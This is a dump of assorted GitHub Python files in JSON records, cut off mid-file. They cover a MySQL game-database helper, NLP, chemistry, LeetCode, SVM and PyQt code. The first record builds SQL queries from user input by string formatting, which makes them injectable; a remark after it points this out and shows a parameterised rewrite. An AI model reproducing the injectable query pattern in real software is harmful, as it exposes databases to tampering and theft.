+{"seq_id":"36168796165","text":"import sys\nimport MySQLdb\n\ndef Conectar_BD(host,usuario,password,nombrebd):\n try:\n db = MySQLdb.connect(host,usuario,password,nombrebd)\n return db\n except MySQLdb.Error as e:\n print(\"No puedo conectar a la base de datos:\",e)\n sys.exit(1)\n\ndef Desconectar_BD(db):\n db.close()\n\ndef ListarMapas(db):\n sql=\"select * from Mapas\"\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"],\"---\",registro[\"nZonas\"],\" zonas\")\n except:\n print(\"Error en la consulta\")\n\ndef MonstruoSubcadena(db,monstruo):\n sql = \"SELECT * FROM Monstruos WHERE nombre REGEXP '^%s'\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n return registro[\"nombre\"]\n\n except:\n print(\"Error en la consulta\")\n\ndef ObjetoMonstruo(db,monstruo):\n MonstruoSubcadena(db,monstruo)\n sql = \"SELECT * FROM Objetos WHERE monstruo = (SELECT idMonstruo FROM Monstruos WHERE nombre REGEXP '^%s')\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n except:\n print(\"Error en la consulta\")\n\ndef NuevoMonstruo(db,nuevo):\n cursor = db.cursor()\n sql=\"insert into Monstruos values (%s, '%s', '%s', %f )\" % (nuevo[\"idMonstruo\"],nuevo[\"nombre\"],nuevo[\"tipo\"],nuevo[\"tamano\"])\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al insertar.\")\n db.rollback()\n\ndef borrarObjeto(db,monstruo):\n buscar = MonstruoSubcadena(db,monstruo)\n sql=\"delete from Objetos where monstruo=(select idMonstruo from Monstruos where nombre = '%s')\" % buscar\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n if cursor.rowcount==0:\n print(\"No hay objetos relacionados con ese monstruo\")\n except:\n print(\"Error al borrar.\")\n db.rollback()\n\ndef AumentarValor(db,porcentaje):\n sql = \"update Objetos SET valor = valor+(valor*%f)/100\"%porcentaje\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al cambiar\")\n db.rollback()\n\ndef MostrarMenu():\n menu='''\n 1. Lista los mapas y el total de zonas que tiene cada uno.\n 2. Muestra los monstruos que empiecen por una subcadena.\n 3. Pide por teclado un monstruo y muestra los objetos que suelta al morir.\n 4. Inserta un nuevo monstruo en la tabla Monstruos.\n 5. Borra los objetos de un monstruo indicado por teclado.\n 6. aumenta el valor de los objetos un porcentaje indicado por teclado.\n 0. Salir\n '''\n print(menu)\n while True:\n try:\n opcion=int(input(\"Opción:\"))\n return opcion\n except:\n print(\"Opción incorrecta, debe ser un número\")","repo_name":"robertorodriguez98/proyecto_BD","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
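The %-formatted SQL in these helpers is open to injection; MySQLdb's cursor.execute() accepts a parameter tuple that quotes values safely. A sketch of NuevoMonstruo in that style (the function name is hypothetical; the table and dict keys are the same as above):

def NuevoMonstruoSeguro(db, nuevo):
    # Placeholders are filled by the driver, so quoting is automatic.
    sql = "insert into Monstruos values (%s, %s, %s, %s)"
    cursor = db.cursor()
    try:
        cursor.execute(sql, (nuevo["idMonstruo"], nuevo["nombre"],
                             nuevo["tipo"], nuevo["tamano"]))
        db.commit()
    except MySQLdb.Error:
        print("Insert failed.")
        db.rollback()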
+{"seq_id":"71659692203","text":"#######################################\n# imports\n\nimport maya.cmds as cmds\n\nimport esa.maya.python.lib.deploy as deploy\n\nreload(deploy)\n\n#######################################\n# attributes\n\npermission = \"developer\"\n\n#######################################\n# functionality\n\ndef deployCurrentToolCageRun():\n\tdeploy.deployCurrentToolCageDev()\n\tcmds.confirmDialog(t=\"msg\", message=\"Current ToolGage DEV deployed to TOOLS.\", button=[\"OK\"]) \n\n#######################################\n# execution\n\nif __name__ == \"__main__\": deployCurrentToolCageRun()","repo_name":"esernaalonso/dev","sub_path":"maya/python/script/deployCurrentToolCage.py","file_name":"deployCurrentToolCage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"27657369783","text":"import codecs\nimport jpype\nimport glob\nimport nltk\nfrom nltk.probability import ConditionalFreqDist\nfrom nltk.tokenize import RegexpTokenizer,sent_tokenize\n\nword_count_dict = {}\n\ndef startJVM():\n\n jpype.startJVM(jpype.getDefaultJVMPath(),\n \"-Djava.class.path=C:/Users/vct_3/Desktop/Tezim/zemberek_jar/zemberek-tum-2.0.jar\", \"-ea\")\n\n Tr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\n\n tr = Tr()\n\n Zemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\n\n zemberek = Zemberek(tr)\n return zemberek\n#kelime analizi yapılacak dosyalar okunur\ndef readFile(filename):\n corpus_raw = u\"\"\n print(\"Reading '{0}'...\".format(filename))\n with codecs.open(filename, \"r\") as book_file:\n corpus_raw += book_file.read()\n return corpus_raw\n\n#gelen kelimelerin türü belirlenir\ndef kelimeCozumle(words, zemberek, word_types):\n for word in words:\n if word.strip()>'':\n yanit = zemberek.kelimeCozumle(word)\n if yanit:\n tip = yanit[0].kok().tip()\n if str(tip) in word_types:\n word_types[str(tip)] = word_types[str(tip)] + 1\n\n\ndef explodeSentences(sentences, punkt_dict, zemberek, word_types):\n #cümleler kelimelere parçalanır\n words = []\n for sentence in sentences:\n words.extend(sentence.split())\n kelimeCozumle(sentence.split(), zemberek, word_types)\n\n #Cümle içindeki noktalama işaretlerinin sayısı\n for word in words:\n for punkt in punkt_dict:\n if punkt in word:\n punkt_dict[punkt] = punkt_dict[punkt] + 1\n\n #metin içindeki farklı kelime sayısı\n from collections import Counter\n word_count_dict = Counter(w.title() for w in words)\n return words, word_count_dict\n\ndef writeFile(result):\n file = open(\"clear_data.csv\",\"w\")\n file.write(result)\n file.close()\n\n\ndef startApp():\n # Zemberek nesnesi oluşturuldu.\n zemberek = startJVM()\n book_filenames = sorted(glob.glob(\"C:/Users/vct_3/Desktop/Köşe Yazıları Kopya/*.txt\"))\n result = \"\"\n\n for filename in book_filenames:\n\n punkt_dict = {\"!\": 0, \".\": 0, \",\": 0, \"?\": 0, \":\": 0}\n word_types = {\"ISIM\": 0, \"FIIL\": 0, \"SIFAT\": 0, \"ZAMIR\": 0, \"ZARF\": 0, \"BAGLAC\": 0, \"EDAT\": 0, \"ZAMAN\": 0,\n \"SAYI\": 0, \"OZEL\": 0, \"KISALTMA\": 0, \"SORU\": 0}\n\n # Dosyayı oku\n text = readFile(filename)\n # Dosyadaki cümleleri ayıkla\n sentences = sent_tokenize(text)\n words, word_count_dict = explodeSentences(sentences, punkt_dict, zemberek, word_types)\n\n # Okunan metni dosyaya yazılmak için csv formatına getir.\n result = result + str(len(sentences)) + \",\"\n result = result + str(len(words)) + ',' + str(len(word_count_dict)) + ','\n\n for key, value in punkt_dict.items():\n result = result + str(value) + ','\n for key, value in word_types.items():\n result = result + str(value) + ','\n result = result + (filename.split(\"-\")[1])[:-4] + \"\\n\"\n writeFile(result)\n\n\nstartApp()\n\n# JVM kapat\njpype.shutdownJVM()\n","repo_name":"Souljah1881/Yazar_Tanima","sub_path":"Get_Attributes/Getting_Attributes_of_Authors.py","file_name":"Getting_Attributes_of_Authors.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"20780306773","text":"\"\"\"\nSetup script for libanac\n\"\"\"\n\nimport sys\nfrom setuptools import setup\n\nimport libanac\n\n\ninstall_requires = [\n 'beautifulsoup4',\n 'requests',\n]\n\nif sys.version_info[:2] < (2, 7):\n install_requires.append('argparse')\n\n\nsetup(\n name=libanac.__title__,\n description=libanac.__summary__,\n long_description=open('README.rst').read(),\n url=libanac.__url__,\n\n author=libanac.__author__,\n author_email=libanac.__email__,\n license=libanac.__license__,\n\n version=libanac.__version__,\n\n packages=['libanac'],\n test_suite='tests',\n\n platforms='any',\n keywords=['ANAC', 'SACI', 'CIV Digital'],\n classifiers=[\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n\n install_requires=install_requires,\n)\n","repo_name":"asenci/libanac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14430117998","text":"from time import sleep\nfrom os import system, name as sysname\n\ndef animation(level):\n with open(level, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n f.close()\n\n ascii_lines = lines[2:26]\n truncated_ascii_lines = [line[:80] for line in ascii_lines]\n system(\"clear\") if sysname == \"posix\" else system(\"cls\")\n\n for line in truncated_ascii_lines:\n print(line)\n\n sleep(5)\n\n for x in range(220):\n print(\"\\033[26A\", end= \"\")\n print(\"\\033[2K\", end = \"\") # erase old line, return cursor to beginning\n truncated_ascii_lines = [line[x+1:80+x+1] for line in ascii_lines]\n sleep(0.04)\n for line in truncated_ascii_lines:\n print(line)\n sleep(5)\n\nanimation(\"level0.txt\")","repo_name":"Spellcasting-Devs/Mundane-Reclamation","sub_path":"testing/animation/text_animation.py","file_name":"text_animation.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"3252468522","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 28 2022\n\n@author: yun\n@purpose: Find cycle in graph. Used for identify all ternary zone in Ca-Na-VP phase diagram.\nThis used for calculation chemical potential of Ca, Na and VPO.\n\n# Need to be moved to somewhere else. Need polishing.\n\"\"\"\nimport numpy as np\nfrom compmatscipy.CompAnalyzer import CompAnalyzer\n\n\nclass ternary_chempo:\n\n def __init__(self, edges, data):\n \"\"\"\n Args:\n edges: list of tuples with form [(std formula, std formula)]\n data: energy dictionary with form {'std formula': energy per atom}\n \"\"\"\n self.edges = edges\n self.data = data\n self.cycles = []\n self.vertices = []\n for edge in self.edges:\n for vertex in edge:\n if vertex not in self.vertices:\n self.vertices.append(vertex)\n self.parse_cycles()\n\n @staticmethod\n def gcd(a, b, rtol=1e-03, atol=1e-03):\n # Need caution. Do not use after rounding floats < 3.\n t = min(abs(a), abs(b))\n while abs(b) > rtol * t + atol:\n a, b = b, a % b\n return a\n\n @staticmethod\n def invert(path) -> list:\n\n return ternary_chempo.rotate_to_smallest(path[::-1])\n\n @staticmethod\n # rotate cycle path such that it begins with the smallest node\n def rotate_to_smallest(path) -> list:\n\n n = path.index(min(path))\n return path[n:] + path[:n]\n\n @staticmethod\n def is_visited_node(node, path) -> bool:\n\n return node in path\n\n @staticmethod\n def cmpd_to_fraction(cmpd) -> tuple:\n \"\"\"\n Args:\n Standard Formula\n Returns:\n tuple of Ca, Na in V2(PO4)3\n \"\"\"\n ca = CompAnalyzer(cmpd)\n reduced_ratio = (ca.amt_of_el('O')) / 12\n ca_amt = ca.amt_of_el('Ca') / reduced_ratio\n na_amt = ca.amt_of_el('Na') / reduced_ratio\n\n return ca_amt, na_amt\n\n @staticmethod\n def fraction_to_cmpd(fraction) -> str:\n \"\"\"\n Args:\n tuple of Ca, Na in V2(PO4)3\n Returns:\n Standard Formula\n \"\"\"\n ratio = ternary_chempo.gcd(fraction[0], fraction[1])\n for i in [2, 3, 12]:\n ratio = ternary_chempo.gcd(ratio, i)\n\n formula = ''\n if not fraction[1] == 0:\n formula += 'Na' + str(fraction[1] / ratio)\n if not fraction[0] == 0:\n formula += 'Ca' + str(fraction[0] / ratio)\n\n formula += 'V' + str(np.round(2 / ratio, 3)) + \\\n 'P' + str(np.round(3 / ratio, 3)) + \\\n 'O' + str(np.round(12 / ratio, 3))\n ca = CompAnalyzer(formula)\n\n return ca.std_formula()\n\n @staticmethod\n def is_three_on_line(x, y, z) -> bool:\n\n return (x[0] * (y[1] - z[1]) + y[0] * (z[1] - x[1]) + z[0] * (x[1] - y[1])) == 0\n\n @staticmethod\n def is_point_in_triangle(s, x, y, z) -> bool:\n\n sx = [s[0] - x[0], s[1] - x[1]]\n s_xy = ((y[0] - x[0]) * sx[1] - (y[1] - x[1]) * sx[0]) > 0\n\n if ((z[0] - x[0]) * sx[1] - (z[1] - x[1]) * sx[0] > 0) == s_xy:\n return False\n if ((z[0] - y[0]) * (s[1] - y[1]) - (z[1] - y[1]) * (s[0] - y[0]) > 0) != s_xy:\n return False\n if s == x or s == y or s == z:\n return False\n\n return True\n\n def is_new_path(self, path) -> bool:\n\n return not (path in self.cycles)\n\n def find_new_cycles(self, path) -> None:\n \"\"\"\n Args:\n path: line connecting vertices.\n Returns:\n Add new cycle to self.cycles.\n This does not consider line or non-smallest cycles.\n \"\"\"\n start_node = path[0]\n\n # visit each edge and each node of each edge\n for edge in self.edges:\n node1, node2 = edge\n if start_node in edge:\n if node1 == start_node:\n next_node = node2\n else:\n next_node = node1\n if not ternary_chempo.is_visited_node(next_node, path):\n # neighbor node not on path yet\n sub = [next_node]\n 
sub.extend(path)\n # explore extended path\n self.find_new_cycles(sub)\n elif len(path) == 3 and next_node == path[-1]:\n # cycle found\n p = ternary_chempo.rotate_to_smallest(path)\n inv = ternary_chempo.invert(p)\n if self.is_new_path(p) and self.is_new_path(inv):\n self.cycles.append(p)\n\n def parse_cycles(self) -> None:\n \"\"\"\n Returns:\n None. update self.cycles.\n parse cycles that are in same line or non-smallest.\n \"\"\"\n for edge in self.edges:\n for node in edge:\n self.find_new_cycles([node])\n\n # change string to fraction of Ca, Na.\n fractions = []\n for i in self.cycles:\n temp = []\n for j in i:\n temp.append(ternary_chempo.cmpd_to_fraction(j))\n fractions.append(temp)\n\n # For removing line or triangle that has point in it.\n min_cycle_list = []\n for i in fractions:\n if not ternary_chempo.is_three_on_line(i[0], i[1], i[2]):\n point_in = False\n for j in self.vertices:\n if ternary_chempo.is_point_in_triangle(ternary_chempo.cmpd_to_fraction(j),\n i[0], i[1], i[2]):\n point_in = True\n break\n if point_in:\n continue\n else:\n min_cycle_list.append(i)\n\n self.cycles = []\n for i in min_cycle_list:\n temp = []\n for j in i:\n temp.append(ternary_chempo.fraction_to_cmpd(j))\n self.cycles.append(tuple(temp))\n\n return\n\n def get_chempo_at_one_cycle(self, x, y, z) -> tuple:\n \"\"\"\n Args:\n x, y, z: str of three coordinates in cycles. In std formula.\n Returns:\n Chemical potential of Ca/Na/VPO\n \"\"\"\n concentrations = np.zeros((3, 3))\n energies = np.zeros((3, 1))\n for i, j in enumerate([x, y, z]):\n ca, na = ternary_chempo.cmpd_to_fraction(j)\n concentrations[i, :] = np.array([ca, na, 17])\n energies[i] = self.data[j] * (ca + na + 17)\n\n chempo = np.linalg.inv(concentrations) @ energies\n\n return chempo\n\n \"\"\"\n Ca_voltage = (-chempo[0][0] - 2.0056) / 2\n Na_voltage = (-chempo[1][0] - 1.3225) / 1\n \"\"\"\n\n def get_chempo_at_cycles(self):\n\n chempo_dict = {}\n for i in self.cycles:\n chempo_dict[i] = self.get_chempo_at_one_cycle(i[0], i[1], i[2])\n\n return chempo_dict\n","repo_name":"YunyeongChoi/CaNaVP","sub_path":"plot/chempo_utils.py","file_name":"chempo_utils.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
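`get_chempo_at_one_cycle` above solves a 3x3 linear system by explicitly inverting the concentration matrix. A sketch of the numerically preferable equivalent with `np.linalg.solve`; the matrix values here are made up, only the shapes match the record:

```python
import numpy as np

concentrations = np.array([[1.0, 0.0, 17.0],
                           [0.0, 3.0, 17.0],
                           [2.0, 1.0, 17.0]])
energies = np.array([[-120.0], [-150.0], [-140.0]])

# solve() factorizes the matrix instead of inverting it,
# which is both faster and better conditioned.
chempo = np.linalg.solve(concentrations, energies)
assert np.allclose(concentrations @ chempo, energies)
```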
+{"seq_id":"27387358415","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', OrganizationHome.as_view(), name='orgs'),\n path('keys/', index, name='keys'),\n path('del_org//', delete_org, name=\"del_org\"),\n path('create_org/', create_org, name=\"create_org\"),\n path('update_org//', update_org, name=\"update_org\"),\n path('del_key//', delete_key, name=\"del_key\"),\n path('create_key/', create_key, name=\"create_key\"),\n path('update_key//', update_key, name=\"update_key\"),\n]\n","repo_name":"daniluuuuuuuk/belgosles_test_task","sub_path":"src/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35455550664","text":"\"\"\"\ninterface Robot {\n // returns true if next cell is open and robot moves into the cell.\n // returns false if next cell is obstacle and robot stays on the current cell.\n boolean move();\n\n // Robot will stay on the same cell after calling turnLeft/turnRight.\n // Each turn will be 90 degrees.\n void turnLeft();\n void turnRight();\n\n // Clean the current cell.\n void clean();\n}\nExample:\n\nInput:\nroom = [\n [1,1,1,1,1,0,1,1],\n [1,1,1,1,1,0,1,1],\n [1,0,1,1,1,1,1,1],\n [0,0,0,1,0,0,0,0],\n [1,1,1,1,1,1,1,1]\n],\nrow = 1,\ncol = 3\n\nExplanation:\nAll grids in the room are marked by either 0 or 1.\n0 means the cell is blocked, while 1 means the cell is accessible.\nThe robot initially starts at the position of row=1, col=3.\nFrom the top left corner, its position is one row below and three columns right.\n\n\"\"\"\n\n\n\n\"\"\"\nWhen we come to a new cell, we turn left. \nIf we try to go and turn right 3 times, \nwe have covered everything in front of us and we should backtrack. \nIf we can go to a direction, since we are facing backward for backtracking, \nwe should turn left instead of right (if we didn't go, \nwe would still face the direction, not its reverse). \nAlso, when we are done with a cell, we should come back from it. \nHere is a minimalist code to solve the problem.\n\"\"\"\n\nDIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n\n\ndef dfs(robot, coord, dindex, visited):\n visited.add(coord)\n robot.clean()\n last_move = True\n for di in [3, 0, 1, 2]:\n robot.turnLeft() if last_move else robot.turnRight()\n d = DIRS[(dindex + di) % 4]\n new_c = (coord[0] + d[0], coord[1] + d[1])\n\n if new_c not in visited and robot.move():\n dfs(robot, new_c, (dindex + di) % 4, visited)\n robot.move() # come back\n last_move = True\n else:\n last_move = False\n\n\nclass Solution5:\n def cleanRoom(self, robot):\n DIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n visited = set()\n\n def dfs(robot, coord, dindex):\n visited.add(coord)\n robot.clean()\n last_move = True\n\n for di in [3, 0, 1, 2]:\n if last_move: # 固定先左后右\n robot.turnLeft()\n else:\n robot.turnRight()\n d = DIRS[(dindex + di) % 4] # 調整方向\n new_c = (coord[0] + d[0], coord[1] + d[1]) # 下一步的位置\n\n if new_c not in visited and robot.move(): # 看一看可不可以前進\n dfs(robot, new_c, (dindex + di) % 4) # 前進\n robot.move() # come back #精華,有前進就必須有相應的後退!!!原路返回\n last_move = True # 下一步繼續嘗試向左轉\n else: # 某個點訪問過了或者不可訪問\n last_move = False # 下一步向右轉\n\n dfs(robot, (0, 0), 0)\n\nclass Solution:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, (0, 0), 0, set())\n\n\n# left, up, right, down\nDIR = ((0, -1), (-1, 0), (0, 1), (1, 0))\n\n\nclass Solution6:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n # assume we start at (0, 0) the origin\n self.dfs(robot, (0, 0), set(), 1)\n\n def dfs(self, robot, curr_pos, visited, facing_direction):\n robot.clean()\n visited.add(curr_pos)\n\n for i in range(4):\n robot.turnLeft()\n # for i in [0, 3], i+1 means how many times we have turned left\n # (facing_direction - (i + 1)) % 4 therefore, is our new facing direction\n new_direction = (facing_direction - i - 1) % 4\n new_pos = (curr_pos[0] + DIR[new_direction][0], curr_pos[1] + DIR[new_direction][1])\n if new_pos not in visited and robot.move():\n self.dfs(robot=robot,\n curr_pos=new_pos,\n visited=visited,\n facing_direction=new_direction)\n # turn around\n 
robot.turnLeft()\n robot.turnLeft()\n # move back\n robot.move()\n # face the previous direction, such that we can continue turning left\n robot.turnLeft()\n robot.turnLeft()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/DFS/LC_489_Robot_Room_Cleaner.py","file_name":"LC_489_Robot_Room_Cleaner.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"15156237694","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef gen_callgraph(callgraph_file):\n callgraph = {}\n for line in callgraph_file.readlines():\n fields = line.split(':')\n caller = int(fields[0])\n callees_strs = fields[1].split(',')\n callees = set(map(lambda item: int(item), callees_strs[:-1]))\n callgraph[caller] = callees\n return callgraph \n\n\ndef gen_funcIdCost(funcIdCost_file):\n funcIdCost = {}\n for line in funcIdCost_file.readlines():\n fields = line.split(',')\n funcId = int(fields[0])\n cost = int(fields[1])\n funcIdCost[funcId] = cost\n return funcIdCost\n\n\ndef gen_most_complexity(comp_file):\n comp_99_func_ids = set()\n comp_2_func_ids = set()\n comp_1_func_ids = set()\n for line in comp_file.readlines():\n fields = line.split(',')\n try:\n func_id = int(fields[0])\n except:\n continue\n comp = int(fields[1])\n if comp == 99:\n comp_99_func_ids.add(func_id)\n if comp == 2:\n comp_2_func_ids.add(func_id)\n if comp == 1:\n comp_1_func_ids.add(func_id)\n if len(comp_99_func_ids) > 10:\n print(\"2^N\")\n return comp_99_func_ids\n elif len(comp_2_func_ids) > 0:\n print(\"N^2\")\n return comp_2_func_ids\n else:\n print(\"N\")\n return comp_1_func_ids\n\n\ndef gen_full_callgraph(callgraph):\n full_callgraph = {}\n for caller, callees in callgraph.items():\n worklist = []\n visited = set()\n for callee in callees:\n worklist.append(callee)\n while len(worklist) > 0:\n curr = worklist.pop()\n if curr in full_callgraph:\n for curr_full_callee in full_callgraph[curr]:\n visited.add(curr_full_callee)\n continue\n if curr not in callgraph:\n continue\n for curr_callee in callgraph[curr]:\n if curr_callee not in visited:\n worklist.append(curr_callee)\n visited.add(curr_callee)\n full_callgraph[caller] = visited\n return full_callgraph\n\n\ndef insert_sort(arr, full_callgraph):\n n = len(arr)\n new_arr = []\n new_arr.append(arr[0])\n\n for i in range(1, n):\n j = 0\n insert_flag = False\n while j < len(new_arr):\n if new_arr[j] in full_callgraph \\\n and arr[i] in full_callgraph[new_arr[j]]:\n new_arr.insert(j, arr[i])\n insert_flag = True\n break\n j += 1\n if not insert_flag:\n new_arr.append(arr[i])\n return new_arr\n\n\ndef gen_rank(callgraph, funcIdCost, compFuncIds):\n compFuncIdCost = dict(filter(lambda elem: elem[0] in compFuncIds, funcIdCost.items()))\n compFuncIdSortedByCost = sorted(compFuncIdCost, key=compFuncIdCost.get, reverse=True)\n # for funcId in compFuncIdSortedByCost:\n # print(funcId, compFuncIdCost[funcId])\n full_callgraph = gen_full_callgraph(callgraph)\n #full_callgraph = callgraph\n rank = insert_sort(compFuncIdSortedByCost, full_callgraph)\n for funcId in rank:\n print(funcId, compFuncIdCost[funcId])\n #lower_bound = compFuncIdCost[rank[1]] * 0.5\n #top_rank = []\n #split_idx = 0\n #for idx, funcId in enumerate(rank):\n # if compFuncIdCost[funcId] < lower_bound:\n # split_idx = idx\n # break\n # top_rank.append(funcId)\n\n ## print(\"top rank:\")\n ## for funcId in top_rank:\n ## print(funcId, compFuncIdCost[funcId])\n #new_top_rank = sorted(top_rank, key=compFuncIdCost.get)\n ## print(\"rank:\")\n #for funcId in new_top_rank:\n # print(funcId, compFuncIdCost[funcId])\n #for funcId in rank[split_idx:]:\n # print(funcId, compFuncIdCost[funcId])\n\ndef main():\n complexity_file_path = sys.argv[1]\n with open(\"callgraph.log\") as infile:\n callgraph = gen_callgraph(infile)\n with open(\"funcIdCost.log\") as infile:\n funcIdCost = gen_funcIdCost(infile)\n with open(complexity_file_path) as infile:\n compFuncIds = 
gen_most_complexity(infile)\n gen_rank(callgraph, funcIdCost, compFuncIds)\n\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"ComAirProject/ComAir","sub_path":"Code/scripts/ranking/gen_rank.py","file_name":"gen_rank.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
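For reference, `gen_full_callgraph` above computes the transitive closure of the call graph: each caller is mapped to every function reachable from it. A compact restatement on a toy graph (the function and data here are illustrative only):

```python
def closure(callgraph):
    full = {}
    for caller in callgraph:
        seen, stack = set(), list(callgraph[caller])
        while stack:
            f = stack.pop()
            if f in seen:
                continue
            seen.add(f)
            stack.extend(callgraph.get(f, ()))
        full[caller] = seen
    return full

# 1 calls 2 and 2 calls 3, so everything reachable from 1 is {2, 3}.
assert closure({1: {2}, 2: {3}}) == {1: {2, 3}, 2: {3}}
```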
+{"seq_id":"72797633322","text":"from sklearn.svm import LinearSVC\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom evaluation import compute_wss\n\ndef prioritise_and_evaluate(X_train,\n y_train,\n X_test,\n y_test):\n \"\"\"\n Trains an L2-regularised linear SVM classifier.\n Documents in the test subset, i.e. X_test, are ranked according to the signed-margin distance between the document feature vectors and the SVM hyperplane.\n :param X_train: Training documents\n :param y_train: Training labels\n :param X_test: Test documents\n :param y_test: Test labels\n :return: work saved over sampling at 95%recall (wss_95) and 100%recall (wss_100)\n \"\"\"\n # define SVM Classifier\n linear_svc = LinearSVC(loss='squared_hinge', penalty='l2',\n dual=False, tol=1e-3, class_weight='balanced', C=0.000001)\n # train SVM classifier\n linear_svc.fit(X_train, y_train)\n\n # get predictions of test documents\n predictions = linear_svc.predict(X_test)\n\n # get distances between test documents and the SVM hyperplane.\n distances = linear_svc.decision_function(X_test)\n test_indexes_with_distances = {}\n for index, prediction in enumerate(predictions):\n test_indexes_with_distances[index] = distances[index]\n\n # order documents in a descending order of their distance to the SVM hyperplane\n test_indexes_with_distances = OrderedDict(\n sorted(test_indexes_with_distances.items(), key=itemgetter(1), reverse=True))\n\n\n # evaluate ranking in terms of work saved over 95% and 100% recall\n wss_95, wss_100 = compute_wss(indexes_with_predicted_distances=test_indexes_with_distances,\n y_test=y_test)\n return wss_95, wss_100","repo_name":"gkontonatsios/DAE-FF","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"1588219492","text":"\nimport sys, os, logging, PyQt4\nfrom logging import debug, info, warning, error, critical\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# --------------------------------------\n\nclass Config(dict):\n \n def __init__(self, rootdir):\n self.initDefaultKeys()\n self.loadAllKeys()\n if (not rootdir is None) and os.path.isdir(rootdir):\n self[\"rootdirectory\"] = rootdir\n debug(\"arg rootdirectory: %s\" % rootdir)\n return\n\n def __getattr__(self, key):\n return self[key]\n def __setattr__(self, key, value):\n self[key]=value\n\n def initDefaultKeys(self):\n info(\"Initializing default keys\")\n defaults = ( ( \"rootdirectory\", \"~/\" ),\n ( \"window/xpos\", \"0\" ),\n ( \"window/ypos\", \"0\" ),\n ( \"window/xsize\", \"250\" ),\n ( \"window/ysize\", \"150\" ) )\n for i in defaults:\n self[ i[0] ] = i[1]\n debug(\"[%s]=%s\"%(i[0], self[i[0]]))\n # default handlers\n self.handlers = [ [\"*.nes\",\"fceu\"] ]\n return\n\n def loadAllKeys(self):\n settings = QSettings()\n info(\"Loading keys from config file: %s\" % settings.fileName())\n settings.sync()\n keys = settings.allKeys()\n for i in keys:\n s = str(i)\n if s.find(\"handlers\") >= 0: continue # skip handlers\n self[s] = settings.value(i).toString()\n debug(\"[%s]=%s\"%(s, self[s]))\n self.loadHandlers(settings)\n return\n\n def loadHandlers(self, settings):\n h = []\n n = settings.beginReadArray(\"handlers\");\n if n == 0: return\n info(\"Loading %i handlers\" % n)\n for i in xrange(0, n):\n settings.setArrayIndex(i);\n glob = str(settings.value(\"glob\").toString())\n launcher = str(settings.value(\"launcher\").toString())\n h.append( [glob, launcher] )\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n self.handlers = h\n settings.endArray()\n return\n\n def saveAllKeys(self):\n settings = QSettings()\n info(\"Saving keys to config file: %s\" % settings.fileName())\n for i in self:\n s = str(self[i])\n if i == \"handlers\": continue # skip handlers\n settings.setValue(i, s)\n debug(\"[%s]=%s\"%(i, s))\n self.saveHandlers(settings)\n settings.sync()\n return\n\n def saveHandlers(self, settings):\n h = self.handlers\n if len(h) == 0: return\n info(\"Saving %i handlers\" % len(h))\n settings.beginWriteArray(\"handlers\", len(h))\n for i in xrange(0, 